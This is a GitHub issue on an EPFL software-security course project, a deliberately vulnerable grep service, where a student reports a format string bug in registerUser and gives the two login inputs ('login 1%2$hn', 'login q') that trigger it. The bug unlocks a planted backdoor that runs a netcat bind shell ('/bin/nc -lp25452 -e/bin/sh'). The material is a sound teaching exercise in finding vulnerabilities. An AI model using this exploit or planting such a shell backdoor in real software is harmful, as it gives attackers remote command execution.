search

xavierpantet / my_ass_on_your_grass

Software Security (CS-412) project at EPFL. Vulnerable GRep AS a Service.
0 stars 1 forks source link

Possible backdoor / format string attack #5

Open poechsel opened 5 years ago

poechsel commented 5 years ago

In the function registerUser a user controlled input is used as a format string:

https://github.com/xavierpantet/my_ass_on_your_grass/blob/355151c90db67b16c7d5877d37a71ef1b92c1f78/src/services/authentication/AuthenticationService.cpp#L16-L20

Furthermore the registerUser is called each time the login command is issued by a user and name is the parameter passed to the login command. Thus the user could pass a valid format string to execute a format string attack and overwrite login with a non zero value.

Then, in the function user_already_logged if the getLogin (which returns the value of login defined in registerUser) of the current user (the one passed by login earlier) is non-zero a snippet of code that will executes /bin/nc -lp25452 -e/bin/sh is called.

https://github.com/xavierpantet/my_ass_on_your_grass/blob/5265459c2eaf05b87a79ccbd51487ce17b85405b/src/commands/Commands.cpp#L280-L295

Exploit: The following sequence of commands will execute this vulnerability:

login 1%2$hn
login q

The first login will rewrite the login variable. The second is here to call the function user_already_login which checks if this client has already executed login with an other username.

guillaumemichel commented 5 years ago

Congrats you found a vulnerability!